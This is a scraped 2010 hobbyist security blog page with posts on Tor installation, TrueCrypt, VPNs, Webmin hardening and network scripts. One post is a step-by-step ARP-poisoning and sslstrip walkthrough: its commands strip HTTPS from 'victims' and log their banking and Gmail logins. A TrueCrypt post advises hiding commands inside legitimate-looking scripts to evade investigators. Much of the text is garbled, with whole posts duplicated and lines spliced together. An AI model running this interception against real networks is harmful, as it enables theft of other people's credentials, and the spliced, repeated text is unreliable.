--.:[packetstorm]:.
#9: The Hacktivist Guide to the Internet
Download for Print: pdf
Download for Reading: pdf
Wednesday, March 31, 2010
Hack This Zine
"The mission of HTZ is to research, create and disseminate information, tools, and tactics that empower people to use technology in a way that is liberating. They support and strengthen local communities through education and action. They strive to learn from each other and focus their skills toward creative goals, to explore and research positive hacktivism, and to defend a free internet and free society."
--.:[packetstorm]:.
--.:[packetstorm]:.
Tuesday, March 30, 2010
Ettercap Revisited - sslstrip
Previously I've worked with ettercap as a network arp poisoning tool, as well as an https hijacking tool to sniff encrypted connections. The downside to using ettercap alone for that job is that most browsers these days will detect a certificate error and at the very least warn the user that something is wrong with the page.
However, we have an alternative, sslstrip. This tool effectively turns every connection your victim makes into a plaintext connection, robbing them of their ssl protection and evading all certificate error concerns. It does this by handling the ssl connection with the server by it's self, and replaces all instances of https with http for the victim.
You can download the sslstrip python script here
You have to setup forwarding and a simple iptables prerouting rule before you begin:
root@zombi:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Fire up ettercap to arp poison your victims, here I just mimic the gateway to the whole local network:
root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //
Then run sslstrip:
root@zombi:~/Downloads/sslstrip-0.7# python sslstrip.py -w dump
sslstrip 0.6 by Moxie Marlinspike running...
When your victim(s) visit what is supposed to be a secure page, they are actually interacting with it without any encryption at all, and will receive no ssl certificate errors. Their only hope is to notice the lack of certain signs, such as the "s" or a lock icon, or other indicators depending on their browser. All of the traffic the passes through sslstrip will be saved to the file you specified with the -w flag.
Here's our victim visiting a banking website:
And here's our victim logging into their gmail:
sure enough, if we check the sslstrip log we see:
root@zombi:~/Downloads/sslstrip-0.7# cat dump
2010-03-30 11:41:28,231 SECURE POST Data (www.google.com):
ltmpl=default<mplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=-1464906762657940239<mpl=default<mpl=default&scc=1&GALX=PcWxJ-d1MHk&Email=fakefakefake&Passwd=justanexample&rmShown=1&signIn=Sign+in&asts=
However, we have an alternative, sslstrip. This tool effectively turns every connection your victim makes into a plaintext connection, robbing them of their ssl protection and evading all certificate error concerns. It does this by handling the ssl connection with the server by it's self, and replaces all instances of https with http for the victim.
You can download the sslstrip python script here
You have to setup forwarding and a simple iptables prerouting rule before you begin:
root@zombi:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@zombi:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
The iptables rule simply states that all web traffic that is directed to your machine be redirected to port 10000, which is where sslstrip will be listening.
Fire up ettercap to arp poison your victims, here I just mimic the gateway to the whole local network:
root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //
Then run sslstrip:
root@zombi:~/Downloads/sslstrip-0.7# python sslstrip.py -w dump
sslstrip 0.6 by Moxie Marlinspike running...
When your victim(s) visit what is supposed to be a secure page, they are actually interacting with it without any encryption at all, and will receive no ssl certificate errors. Their only hope is to notice the lack of certain signs, such as the "s" or a lock icon, or other indicators depending on their browser. All of the traffic the passes through sslstrip will be saved to the file you specified with the -w flag.
Here's our victim visiting a banking website:
And here's our victim logging into their gmail:
sure enough, if we check the sslstrip log we see:
root@zombi:~/Downloads/sslstrip-0.7# cat dump
2010-03-30 11:41:28,231 SECURE POST Data (www.google.com):
ltmpl=default<mplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=-1464906762657940239<mpl=default<mpl=default&scc=1&GALX=PcWxJ-d1MHk&Email=fakefakefake&Passwd=justanexample&rmShown=1&signIn=Sign+in&asts=
Friday, March 26, 2010
Script: Ubuntu Tor Scripted Install
There are alot of "How to install Tor on Ubuntu" guides out there, but they all require a bit of familiarity with the OS. To help people that aren't quite up to par with using the terminal extensively or managing packages yet get quick access to tor, I wrote a quick script to help automate the process. You can download the script here.
This script follows the basic install guide for Ubuntu 9.10 on the tor website.
Just download the script, then run the following commands:
-----------------------------------------------------
#!/bin/bash
#Automatic Tor Installation and local proxy configuration for Ubuntu.
#Version 1.0
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root or using sudo"
exit 1
fi
echo "deb http://deb.torproject.org/torproject.org $(cat /etc/lsb-release |grep CODENAME|sed 's/\=/ /g'|awk '{print $2}') main" >> /etc/apt/sources.list
if [ $HOME != "/root" ]; then
sudo -u $(echo $HOME |cut -d/ -f3) gpg --keyserver keys.gnupg.net --recv 886DDD89
sudo -u $(echo $HOME |cut -d/ -f3) gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
fi
if [ $HOME == "/root" ]; then
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
fi
apt-get update
apt-get install tor tor-geoipdb polipo vidalia
apt-get remove privoxy
wget https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf
cp polipo.conf /etc/polipo/config
cp polipo.conf ~/.polipo
/etc/init.d/polipo restart
/etc/init.d/tor stop
firefox https://addons.mozilla.org/en-US/firefox/addon/2275
vidalia
This script follows the basic install guide for Ubuntu 9.10 on the tor website.
Just download the script, then run the following commands:
chmod a+x ubuntu_tor.sh
sudo ./ubuntu_tor.sh-----------------------------------------------------
#!/bin/bash
#Automatic Tor Installation and local proxy configuration for Ubuntu.
#Version 1.0
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root or using sudo"
exit 1
fi
echo "deb http://deb.torproject.org/torproject.org $(cat /etc/lsb-release |grep CODENAME|sed 's/\=/ /g'|awk '{print $2}') main" >> /etc/apt/sources.list
if [ $HOME != "/root" ]; then
sudo -u $(echo $HOME |cut -d/ -f3) gpg --keyserver keys.gnupg.net --recv 886DDD89
sudo -u $(echo $HOME |cut -d/ -f3) gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
fi
if [ $HOME == "/root" ]; then
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
fi
apt-get update
apt-get install tor tor-geoipdb polipo vidalia
apt-get remove privoxy
wget https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf
cp polipo.conf /etc/polipo/config
cp polipo.conf ~/.polipo
/etc/init.d/polipo restart
/etc/init.d/tor stop
firefox https://addons.mozilla.org/en-US/firefox/addon/2275
vidalia
Tuesday, March 23, 2010
Monday, March 22, 2010
Finals Week -- Movie Time
It's a shame having to study random junk for school instead of doing research, but at least I found another neat documentary.
The Rise of Silicon Valley
Friday, March 19, 2010
TrueCrypt - a tactical approach
Truecrypt is a powerful encryption tool that allows average users to create encrypted files and drives with some of the strongest known encryption algorithms. However, when dealing with some users of Truecrypt I've found that they commit certain mistakes:
When it comes to encryption algorithms, using the two stage cascade is a good mix of paranoia without loosing too much IO performance. Options 5 and 7 can really seem to slow things down at times.
Encryption algorithm:
1) AES
2) Serpent
3) Twofish
4) AES-Twofish
5) AES-Twofish-Serpent
6) Serpent-AES
7) Serpent-Twofish-AES
8) Twofish-Serpent
Select [1]: 8
Hash algorithm:
1) RIPEMD-160
2) SHA-512
3) Whirlpool
Select [1]: 3
Filesystem:
1) FAT
2) None
Select [1]: 1
When choosing a password, value length over complexity. A favourite phrase from a book that you haven't repeated to anyone else is a good choice, anything over 16 characters should be sufficient for most people. Remember, if you forget this password the files stored in the Truecrypt volume are likely to be lost forever.
Enter password:
Re-enter password:
Enter keyfile path [none]:
Please type at least 320 randomly chosen characters and then press Enter:
egw9eughrwp9eghrw9euhgw039urht0239urht20935ugh09guh7205049guhweeeguhpwiehrgpweihrwgergeet35y235w235yw235y235yweywerwergwwregowegruthw935uhg0w8yrh08yhy8g08yG)*YG(O*YFG)(*TYFGITUFCYDTESYEAY@YA#%A*SURYDKTfgK%&EDiurDI^$EdiRDI^%$DIRDIDlkGVKFTGKUFITUFO&FROI^FTouTFOUTDFOITdIORDIIITflglidghfhjgfhghurie8d7fr6t43ghjeirfogp;t.r,f.gb;'hb[np;ml.,,,,,.;"{PL<>:POIJHGFDSAQ!@#$%^&*wewtwetwetweh087w2y30rgh4g02r2hg0r(OL:>
Done: 100.000% Speed: 7.7 MB/s Left: 0 s
The TrueCrypt volume has been successfully created.
So now we have what appears to be a 120MB Linux iso in our downloads folder, which seems perfectly reasonable and likely wont draw any attention, but when mounted has all of our secret data. You can use other locations and file types, just make sure that the name, extension, and size all make sense together.
Problem 3... leaving encrypted volumes mounted after the user is finished with them. Well, if you're lucky whoever is after your files wont realize you have any encryption and will just pull the plug on the machine, at which point after a few minutes (Cold Boot Attack), everything is fine. However.. it would be better to setup a cronjob to attempt to auto unmount all encrypted volumes periodically.
The simple method is ofcourse:
This will try to unmount all truecrypt volumes every 15 minutes, it is just an attempt however.. if a volume is in use, the unmount will fail and it will try again in 15 minutes.
Wait though, we've just put a reference to truecrypt in one of the first places someone analyzing your system is going to look in order to gather information. A better option would be to find a script that's reasonable to run that often, such as a log checker, or a security daemon, and hide the truecrypt command inside of it... at least then it wont be quite so obvious, tossed in somewhere around line 80 of a script that looks legitimate.
Problem 4, Wiping memory:
This is a quick script to flush cached memory and thus hopefully make sure your Truecrypt password or any sensitive information isn't still stuck in ram or paged.
echo 2 > /proc/sys/vm/drop_caches
echo 3 > /proc/sys/vm/drop_caches
Add this to that same cronjob script that's unmounting your truecrypt volumes, and make sure to run it after you've unmounted volumes yourself.
There are probably more ways to further improve the security of truecrypt and lessen it's exposure, but following these concepts should give any user a good start.
------
Always remember the wisdom of xkcd.com though...
- One of the best ways to make sure that your encrypted files are never broken into is to never draw attention to them in the first place, however some users name their Truecrypt files something obvious, like "truecrypt", "private", "secret", "secure", or "encrypted".
- Even if they name it something not so obvious, they make the encrypted volume massive without giving it a legitimate extension. A 10GB file named "stuff" in your home directory will raise suspicion.
- They decrypt the files to access them, but then never unmount the encrypted volume... leaving it exposed until the machine is shut down.
- Even if they do unmount the volume, they don't have a mechanism for making sure they cleared out running memory.
root@oblivion:~# mkdir ~/Downloads
root@oblivion:~# touch ~/Downloads/linux-alt.iso
root@oblivion:~# truecrypt -t -c
Volume type:
1) Normal
2) Hidden
Select [1]: 1
Enter volume path: /root/Downloads/linux-alt.iso
Enter volume size (sizeK/size[M]/sizeG): 120M
Volume type:
1) Normal
2) Hidden
Select [1]: 1
Enter volume path: /root/Downloads/linux-alt.iso
Enter volume size (sizeK/size[M]/sizeG): 120M
When it comes to encryption algorithms, using the two stage cascade is a good mix of paranoia without loosing too much IO performance. Options 5 and 7 can really seem to slow things down at times.
Encryption algorithm:
1) AES
2) Serpent
3) Twofish
4) AES-Twofish
5) AES-Twofish-Serpent
6) Serpent-AES
7) Serpent-Twofish-AES
8) Twofish-Serpent
Select [1]: 8
Hash algorithm:
1) RIPEMD-160
2) SHA-512
3) Whirlpool
Select [1]: 3
Filesystem:
1) FAT
2) None
Select [1]: 1
When choosing a password, value length over complexity. A favourite phrase from a book that you haven't repeated to anyone else is a good choice, anything over 16 characters should be sufficient for most people. Remember, if you forget this password the files stored in the Truecrypt volume are likely to be lost forever.
Enter password:
Re-enter password:
Enter keyfile path [none]:
Please type at least 320 randomly chosen characters and then press Enter:
egw9eughrwp9eghrw9euhgw039urht0239urht20935ugh09guh7205049guhweeeguhpwiehrgpweihrwgergeet35y235w235yw235y235yweywerwergwwregowegruthw935uhg0w8yrh08yhy8g08yG)*YG(O*YFG)(*TYFGITUFCYDTESYEAY@YA#%A*SURYDKTfgK%&EDiurDI^$EdiRDI^%$DIRDIDlkGVKFTGKUFITUFO&FROI^FTouTFOUTDFOITdIORDIIITflglidghfhjgfhghurie8d7fr6t43ghjeirfogp;t.r,f.gb;'hb[np;ml.,,,,,.;"{PL
Done: 100.000% Speed: 7.7 MB/s Left: 0 s
The TrueCrypt volume has been successfully created.
So now we have what appears to be a 120MB Linux iso in our downloads folder, which seems perfectly reasonable and likely wont draw any attention, but when mounted has all of our secret data. You can use other locations and file types, just make sure that the name, extension, and size all make sense together.
Problem 3... leaving encrypted volumes mounted after the user is finished with them. Well, if you're lucky whoever is after your files wont realize you have any encryption and will just pull the plug on the machine, at which point after a few minutes (Cold Boot Attack), everything is fine. However.. it would be better to setup a cronjob to attempt to auto unmount all encrypted volumes periodically.
The simple method is ofcourse:
root@oblivion:~# crontab -e
15,30,45,59 * * * * truecrypt -dThis will try to unmount all truecrypt volumes every 15 minutes, it is just an attempt however.. if a volume is in use, the unmount will fail and it will try again in 15 minutes.
Wait though, we've just put a reference to truecrypt in one of the first places someone analyzing your system is going to look in order to gather information. A better option would be to find a script that's reasonable to run that often, such as a log checker, or a security daemon, and hide the truecrypt command inside of it... at least then it wont be quite so obvious, tossed in somewhere around line 80 of a script that looks legitimate.
Problem 4, Wiping memory:
This is a quick script to flush cached memory and thus hopefully make sure your Truecrypt password or any sensitive information isn't still stuck in ram or paged.
root@oblivion:~# cat freemem.sh
sync
echo 1 > /proc/sys/vm/drop_cachesecho 2 > /proc/sys/vm/drop_caches
echo 3 > /proc/sys/vm/drop_caches
Add this to that same cronjob script that's unmounting your truecrypt volumes, and make sure to run it after you've unmounted volumes yourself.
There are probably more ways to further improve the security of truecrypt and lessen it's exposure, but following these concepts should give any user a good start.
------
Always remember the wisdom of xkcd.com though...
Wednesday, March 17, 2010
Smoked Glass 6.0.1
Adamz dropped an update for us Droid fans this week, and its big... tons of new stuff has been added.
http://alldroid.org/threads/16302-ROM.tgz-Smoked-Glass-v6.0.1-*03-15*-(Android-2.1-ESE53)?p=564458#post564458
Having a bash shell, rocks. Having spiffy live wallpapers, rocks. Having more available modules for this custom kernel... win. I went ahead and wiped data on this one, started fresh with this image and the OTA blocker. (for those of you afraid of wiping /data, its not a big deal, you redownload your apps, google remembers which ones youve allready paid for, and reinput your login info. In a way, it was nice to just get rid of all the extra apps id downloaded just to try out).
Started working on creating a gentoo chroot system on the sdcard... but cant't get android to mount the image yet. As soon as I figure out how to get chroot gentoo on my droid, i'll post more about it.
March 15, 2010 (6.0 & 6.0.1 - ESE53)
6.0.1
http://alldroid.org/threads/16302-ROM.tgz-Smoked-Glass-v6.0.1-*03-15*-(Android-2.1-ESE53)?p=564458#post564458
Having a bash shell, rocks. Having spiffy live wallpapers, rocks. Having more available modules for this custom kernel... win. I went ahead and wiped data on this one, started fresh with this image and the OTA blocker. (for those of you afraid of wiping /data, its not a big deal, you redownload your apps, google remembers which ones youve allready paid for, and reinput your login info. In a way, it was nice to just get rid of all the extra apps id downloaded just to try out).
Started working on creating a gentoo chroot system on the sdcard... but cant't get android to mount the image yet. As soon as I figure out how to get chroot gentoo on my droid, i'll post more about it.
March 15, 2010 (6.0 & 6.0.1 - ESE53)
6.0.1
- Quick Update for Smoked Glass Only Theme (Transparent Notification Background and Stock Volume/Progress Bars)
- There is no need to update to this version unless you use the Smoked Glass Only Theme with NO Blue...
- Updated to Android Build ESE53 (The Droid 2.1 OTA Update)
- ALL APKs have been Optimized and Zipaligned to ensure speed
- All new kernels... with tons of choices (See Smoked Glass Boots for more...)
- 2.1 Multi-Touch Browser is standard (and works great!)
- 2.1 Multi-Touch Maps is standard (Either uninstall your current Maps from /data before Installing the ROM, or Uninstall the Maps from the ROM and install from Market if you have issues)
- 2.1 Multi-Touch Gallery is standard
- 2.1 Desk Clock is standard (choice to remove during installation)
- 2.1 News & Weather Widget is standard (choice to remove during installation)
- 2.1 Voice Search Keyboard is standard
- Google Goggles App is standard (choice to remove during installation)
- Live Wallpapers are standard and interactive (with 2.0.1 Launcher)
- I have customized and included options for the Neural Network Live Wallpaper (Pixel Color & Background)
- Choice of Neural Network Backgrounds
- Stock Neural Network Background
- Nexus One Live Wallpaper Background
- Choice of Neural Network Pixel Colors
- Stock Sholes Red
- Blue
- Green
- Red
- Yellow
- Nexus (All 4 Colors)
- Choice of Neural Network Backgrounds
- Updated the theme for Contacts & Phone (Blue background and dialer updates)
- Updated the Blue Progress Bars/Volume Bars (Color fades and is not flat)
- Added more scripts
- Option to choose 3-Screen 2.0.1 Launcher or 5-screen 2.0.1 Launcher (No A/R
- WIP)
- Options to choose how often your WiFi scans for new networks (to save battery)
- Options to choose if and how much of an increase in HQ video recording (Bitrate
- Mb/s)
- Options to choose to install Wifi Tether to /system or copy to SD Card to install later
- Options to choose to install Low Brightness App to /system or copy to SD Card to install later
- Options to choose to install Audio Toggle App to /system or copy to SD Card to install later
- Option to shorten the ring delay
- Option to Copy YOUR Custom Ringtones/Notifications from SD Card to your System
- Option to install Helix Launcher
Saturday, March 13, 2010
Archiving Surveillance Video
Script Time!
One using Bash to archive some files, and one using perl to send email alerts.
Even with my video captures only being triggered by motion... all the cars passing by, windy days, or cats that wander aimlessly around outside lead to images and .swf files to start building up fast. In the last week I had over 40000 .jpg files.. so along with turning down the sensitivity of the motion capture a bit, and moving a hanging plant out of the camera's view, I went ahead and made an archive script.
#!/bin/bash
#when archiving, toss the still images, keep the .swf videos.
#This uses a for loop to do it because motion can actually create
#more files than the rm command can handle by it's self.
for i in $(ls /motion/ |grep .jpg); do rm /motion/$i; done
#make a temp archive folder and drop the videos in it
mkdir /tmp/archv
mv /motion/*.swf /tmp/archv/.
#anything you use more than once should be a variable
timestamp=$(date |awk '{print $2$3"-"$6}')
#build all the videos into a timestamped tarball for storage
tar czvf archive-$timestamp.tar.gz /tmp/archv
#check to make sure the new archive was made
#if it wasnt, leave the tmp file alone and send an email alert
if [ -f archive-$timestamp.tar.gz ]
then
rm -r /tmp/archv
else
perl /root/mail.pl
fi
#while we're here, just check on the disk usage
#and send an email alert if its over 50%
if [ $(df -h |grep /dev/sda1|awk '{print $5}'|cut -d% -f1) -ge 50 ]
then
/root/useagealert.pl
fi
The two perl scripts that are called are simple mailers, great little templates for interacting with sendmail. Here is an example of one:
#!/usr/bin/perl
$title='archive';
$to='me@myaddress.com';
$from= 'archive@myserver.org';
$subject='Archive Failed';
open(MAIL, "|/usr/sbin/sendmail -t");
## Mail Header
print MAIL "To: $to\n";
print MAIL "From: $from\n";
print MAIL "Subject: $subject\n\n";
## Mail Body
print MAIL "Archive process failed, please check the logs\n";
close(MAIL);
The archive script should then be added to the crontab, mine is set to archive twice a week for now, which will usually give me time to save images if I need to.
One using Bash to archive some files, and one using perl to send email alerts.
Even with my video captures only being triggered by motion... all the cars passing by, windy days, or cats that wander aimlessly around outside lead to images and .swf files to start building up fast. In the last week I had over 40000 .jpg files.. so along with turning down the sensitivity of the motion capture a bit, and moving a hanging plant out of the camera's view, I went ahead and made an archive script.
#!/bin/bash
#when archiving, toss the still images, keep the .swf videos.
#This uses a for loop to do it because motion can actually create
#more files than the rm command can handle by it's self.
for i in $(ls /motion/ |grep .jpg); do rm /motion/$i; done
#make a temp archive folder and drop the videos in it
mkdir /tmp/archv
mv /motion/*.swf /tmp/archv/.
#anything you use more than once should be a variable
timestamp=$(date |awk '{print $2$3"-"$6}')
#build all the videos into a timestamped tarball for storage
tar czvf archive-$timestamp.tar.gz /tmp/archv
#check to make sure the new archive was made
#if it wasnt, leave the tmp file alone and send an email alert
if [ -f archive-$timestamp.tar.gz ]
then
rm -r /tmp/archv
else
perl /root/mail.pl
fi
#while we're here, just check on the disk usage
#and send an email alert if its over 50%
if [ $(df -h |grep /dev/sda1|awk '{print $5}'|cut -d% -f1) -ge 50 ]
then
/root/useagealert.pl
fi
#!/usr/bin/perl
$title='archive';
$to='me@myaddress.com';
$from= 'archive@myserver.org';
$subject='Archive Failed';
open(MAIL, "|/usr/sbin/sendmail -t");
## Mail Header
print MAIL "To: $to\n";
print MAIL "From: $from\n";
print MAIL "Subject: $subject\n\n";
## Mail Body
print MAIL "Archive process failed, please check the logs\n";
close(MAIL);
The archive script should then be added to the crontab, mine is set to archive twice a week for now, which will usually give me time to save images if I need to.
Friday, March 12, 2010
Linux: The Code, Parts 1 and 2
First two parts of "The Code", 2006 documentary on open source software and its use around the globe.
Hooray for more publicly available documentaries.
Networking Cheatsheets
Networking references are useful both for people trying to learn about these subjects for the first time, as well as for those of us that just like to have a quick reference handy, cheat-sheets will always have a place in information technology.
Thank you @packet_storm, these are awesome.
Thank you @packet_storm, these are awesome.
- IPv4 Cheatsheet http://packetstormsecurity.org/filedesc/IPv4_Subnetting.pdf.html
- Network Address Translation (NAT) Cheatsheet http://packetstormsecurity.org/filedesc/NAT.pdf.html
- Virtual Lan (VLAN) Cheatsheet http://packetstormsecurity.org/filedesc/VLANs.pdf.html
- Wireshark Display Filters Cheatsheet http://packetstormsecurity.org/filedesc/Wireshark_Display_Filters.pdf.html
- Common Ports Cheatsheet http://packetstormsecurity.org/filedesc/common-ports.pdf.html
- tcpdump Cheatsheet http://packetstormsecurity.org/filedesc/tcpdump.pdf.html
- Cisco IOS IPv4 Access Lists Cheatsheet http://packetstormsecurity.org/filedesc/IOS_IPv4_Access_Lists.pdf.html
Wednesday, March 10, 2010
Securing Webmin
If you are a fledgling sysadmin, feeling lazy, or just plain want a gui and find yourself installing webmin on your server, please take a few minutes to secure it. I have a few simple examples of how this can be done. A lot of this also applies to other systems, so its good information to know even if you plan on never running webmin.
This was done using a webmin install on Gentoo, but should work the same on ubuntu or any other distro.
#vim /etc/webmin/miniserv.conf
It would also be a good idea to at this point, if you hadn't already, add port 10000 to your portsentry rules. (http://www.insecuresystem.org/2010/01/iptables-blacklist.html)
Edit the miniserv.conf file, then restart webmin
Then from any other machine establish an ssh tunnel which forwards the webmin port
And point your browser at https://localhost:54444
.....
This was done using a webmin install on Gentoo, but should work the same on ubuntu or any other distro.
Universal Step 1, Change the default port:
Webmin listens on port 10000 by default and it is well known, this is a port that scripts and attackers actively look for. So to start, just change the port and reload webmin. I'll use 54444, use a different one in your own setup.#vim /etc/webmin/miniserv.conf
...
port=54444
listen=54444
...
#/etc/init.d/webmin restart
It would also be a good idea to at this point, if you hadn't already, add port 10000 to your portsentry rules. (http://www.insecuresystem.org/2010/01/iptables-blacklist.html)
Option, Limit Access with Iptables:
Only allow certain IP address or networks to reach the webmin port, drop all other attempts. I recommend establishing a chain similar to the example below.#iptables -N WEBMIN
#iptables -I INPUT 1 -p tcp --dport 54444 -j WEBMIN
#iptables -I INPUT 2 -p udp --dport 54444 -j WEBMIN
#iptables -A WEBMIN -s 192.168.168.0/24 -j ALLOW
#iptables -A WEBMIN -j DROP
Option, limit it to localhost and access webmin via port-forwarding:
Edit the miniserv.conf file, then restart webmin
#vim /etc/webmin/miniserv.conf
allow=127.0.0.1
Then from any other machine establish an ssh tunnel which forwards the webmin port
#ssh -L 54444:localhost:54444 user@myserver.org
And point your browser at https://localhost:54444
Option, Hide it inside a VPN:
If you establish a simple VPN then you can use either Iptables or the miniserv allow option as above to limit webmin to only allow access to the private vpn subnet.Finally:
Webmin has had exploits against in the past; if you use it, make sure you keep it up to date......
ps:
#/etc/init.d/webmin stop
#emerge --unmerge webmin
Ettercap Plugins
Awesome high quality video from backtrack.it on using some of ettercap's plug-ins to both mess with network traffic, as well as detect if anyone else is trying to. I'll probably be exploring some of these myself soon.
Watch it full screen... with some good speakers for the music.
Sunday, March 7, 2010
A Little Hacker History
As long as this video stays up on Google, hopefully anyone interested can take the time to watch it. This is the history of Kevin Mitnick, of how the media metaphorically crucified him, and a view of the developing environment of the digital age.
Street Art
Normally I'm opposed to graffiti, but this is just too awesome..
I wouldn't mind seeing tux and other Linux related art show up around town instead of gang tagging, particularly if the work actually looks good. I have no idea if the above image is real or if it's been shopped at all, I just love the concept, and if it is real Id love for their to be more.
I wouldn't mind seeing tux and other Linux related art show up around town instead of gang tagging, particularly if the work actually looks good. I have no idea if the above image is real or if it's been shopped at all, I just love the concept, and if it is real Id love for their to be more.
Don't Talk to the Police
It's apparently a video day, so here's a couple more. These two are both very entertaining.. and may be handy information for people to have, particularly those of us that tend to mess with technology in unusual ways.
Friday, March 5, 2010
Quick VPN
Here is a fast and simple Open VPN configuration, it has no special features and uses a shared key for access, but you can have a VPN server running in about a minute. I tested it between the gentoo netbook, my linode, and a backtrack install.
On the server:
On the client:
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=1.08 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=1.27 ms
^C
If you actually want to build a more permanent and secure vpn system, the Gentoo wiki has a great guide for that: http://en.gentoo-wiki.com/wiki/OpenVPN
On the server:
root@bt:/# cd /etc/openvpn
root@bt:/etc/openvpn# openvpn --genkey --secret quick.key
root@bt:/etc/openvpn# vim quickvpn.conf
dev tun
ifconfig 10.0.0.1 10.0.0.2
secret quick.key
ifconfig 10.0.0.1 10.0.0.2
secret quick.key
root@bt:/etc/openvpn# scp quick.key root@client.tld:.
root@bt:/etc/openvpn# /etc/init.d/openvpn start On the client:
root@zombi:/# cp quick.key /etc/openvpn/.
root@zombi:/# cd /etc/openvpn
root@zombi:/etc/openvpn# vim quickvpnclient.conf
remote vpnserver.tld
dev tun
ifconfig 10.0.0.2 10.0.0.1
secret quick.key
dev tun
ifconfig 10.0.0.2 10.0.0.1
secret quick.key
root@zombi:/etc/openvpn# /etc/init.d/openvpn start
root@zombi:/etc/openvpn# ping 10.0.0.1PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=1.08 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=1.27 ms
^C
If you actually want to build a more permanent and secure vpn system, the Gentoo wiki has a great guide for that: http://en.gentoo-wiki.com/wiki/OpenVPN
Linux Wireless "Bridge"
As pointed out by a visitor to this site, this is not a "bridge" in the true networking sense as a bridge is a layer 2 device that joins network segments and this is a layer 3 routing setup, but oddly it is still a common term for this sort of device. Technically this is a simple iptables based router, one of the interfaces just happens to be wireless.
---
This keeps coming in handy every so often, it's a simple script to turn a Linux laptop into a router that manages traffic between it's wired and wireless interfaces. Today I ended up using it to get networking to a machine in an environment where there were no available ports on the switch to plug into; previously it's been used to provide access to a LAN which had no access to the WAN on its own, but there was a local wireless network which did.
Run this after establishing a wireless connection and connecting to another machine or switch, it will setup the private Ethernet network, iptables rules, forwarding, and the dhcp server.
So far this has been tested to setup a wireless bridge on Ubuntu 9.10 as well as multiple Gentoo installs.
---
This keeps coming in handy every so often, it's a simple script to turn a Linux laptop into a router that manages traffic between it's wired and wireless interfaces. Today I ended up using it to get networking to a machine in an environment where there were no available ports on the switch to plug into; previously it's been used to provide access to a LAN which had no access to the WAN on its own, but there was a local wireless network which did.
Run this after establishing a wireless connection and connecting to another machine or switch, it will setup the private Ethernet network, iptables rules, forwarding, and the dhcp server.
#!/bin/bash
echo "router build for public interface ath0, private interface eth0"
echo "--------------------------------------------------------------"
echo "setting up the wire"
ifconfig eth0 192.168.0.1 netmask 255.255.255.0
echo "building nat for 192.168.0.X network"
iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o ath0 -j MASQUERADE
echo "setting routes between ethernet and wireless"
iptables -A FORWARD -s 192.168.0.0/24 -o ath0 -j ACCEPT
iptables -A FORWARD -d 192.168.0.0/24 -m state --state ESTABLISHED,RELATED -i ath0 -j ACCEPT
echo "saving"
sh -c "iptables-save > /etc/iptables.rules"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "success!"
echo "---------------------------------------"
echo "setting up dhcp for eth0"
echo "option domain-name-servers 4.2.2.2;" > /etc/dhcpd.conf
echo "default-lease-time 60;" >> /etc/dhcpd.conf
echo "max-lease-time 72;" >> /etc/dhcpd.conf
echo "ddns-update-style none;" >> /etc/dhcpd.conf
echo "authoritative;" >> /etc/dhcpd.conf
echo "log-facility local7;" >> /etc/dhcpd.conf
echo "subnet 192.168.0.0 netmask 255.255.255.0 {" >> /etc/dhcpd.conf
echo " range 192.168.0.100 192.168.0.254;" >> /etc/dhcpd.conf
echo " option routers 192.168.0.1;" >> /etc/dhcpd.conf
echo " option domain-name-servers 4.2.2.2;" >> /etc/dhcpd.conf
echo "}" >> /etc/dhcpd.conf
dhcpd
echo "dhcpd server running for eth0 network"
echo "router build for public interface ath0, private interface eth0"
echo "--------------------------------------------------------------"
echo "setting up the wire"
ifconfig eth0 192.168.0.1 netmask 255.255.255.0
echo "building nat for 192.168.0.X network"
iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o ath0 -j MASQUERADE
echo "setting routes between ethernet and wireless"
iptables -A FORWARD -s 192.168.0.0/24 -o ath0 -j ACCEPT
iptables -A FORWARD -d 192.168.0.0/24 -m state --state ESTABLISHED,RELATED -i ath0 -j ACCEPT
echo "saving"
sh -c "iptables-save > /etc/iptables.rules"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "success!"
echo "---------------------------------------"
echo "setting up dhcp for eth0"
echo "option domain-name-servers 4.2.2.2;" > /etc/dhcpd.conf
echo "default-lease-time 60;" >> /etc/dhcpd.conf
echo "max-lease-time 72;" >> /etc/dhcpd.conf
echo "ddns-update-style none;" >> /etc/dhcpd.conf
echo "authoritative;" >> /etc/dhcpd.conf
echo "log-facility local7;" >> /etc/dhcpd.conf
echo "subnet 192.168.0.0 netmask 255.255.255.0 {" >> /etc/dhcpd.conf
echo " range 192.168.0.100 192.168.0.254;" >> /etc/dhcpd.conf
echo " option routers 192.168.0.1;" >> /etc/dhcpd.conf
echo " option domain-name-servers 4.2.2.2;" >> /etc/dhcpd.conf
echo "}" >> /etc/dhcpd.conf
dhcpd
echo "dhcpd server running for eth0 network"
So far this has been tested to setup a wireless bridge on Ubuntu 9.10 as well as multiple Gentoo installs.
Tuesday, March 2, 2010
Build Your Own Trojan, Pt. 2
